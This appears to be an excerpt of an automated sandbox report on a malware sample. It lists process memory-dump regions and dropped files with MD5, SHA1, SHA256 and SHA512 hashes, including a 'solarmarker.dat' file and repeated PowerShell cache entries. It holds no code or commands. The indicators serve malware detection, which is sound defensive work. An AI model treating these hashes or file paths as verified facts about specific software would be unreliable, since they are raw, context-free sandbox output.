SHA512 67cb54e8f0d0c0391cb9c60ec05b312f19e6934bd3affe9b08237d6932acd76b07a4a3075341cd153796211afd5fe3d684825ecfc49e17f2788b37df0bc0ad42

memory/1924-334-0x00000000047E0000-0x00000000047F0000-memory.dmp

memory/3080-335-0x0000000005610000-0x0000000005620000-memory.dmp

memory/1568-337-0x0000000003080000-0x0000000003090000-memory.dmp

memory/4392-328-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/980-340-0x0000000003240000-0x0000000003250000-memory.dmp

memory/2492-338-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/980-341-0x0000000003240000-0x0000000003250000-memory.dmp

memory/5020-359-0x0000000005230000-0x0000000005240000-memory.dmp

memory/2492-360-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/2456-362-0x0000000002590000-0x00000000025A0000-memory.dmp

C:\Users\Admin\appdata\roaming\solarmarker.dat

MD5 3afc886140acb1fb8adf64e7de31aaf3
SHA1 4045e92781bb6d0218ad556103bd7cf2744d471d
SHA256 cd7fe991a85849fdeca6d5891561672feb6f12b5d52fd5dc00b3c6d3e1754f9a
SHA512 14f5e327c64c49ccb4f2874766c587f23b87908fee260b1e265b501f115bbd5f2260554c6283dd6e6a0dc8b40d17d2a8f7bad220bdce332a78b9590a4faca826

memory/5020-369-0x0000000005230000-0x0000000005240000-memory.dmp

memory/4392-371-0x00000000030B0000-0x00000000030C0000-memory.dmp

memory/3676-373-0x0000000004520000-0x0000000004530000-memory.dmp

memory/2456-372-0x0000000002590000-0x00000000025A0000-memory.dmp

memory/1568-374-0x0000000003080000-0x0000000003090000-memory.dmp

memory/1924-375-0x00000000047E0000-0x00000000047F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4252-386-0x0000000002F20000-0x0000000002F30000-memory.dmp

memory/2492-387-0x0000000004F10000-0x0000000004F20000-memory.dmp

memory/980-388-0x0000000003240000-0x0000000003250000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6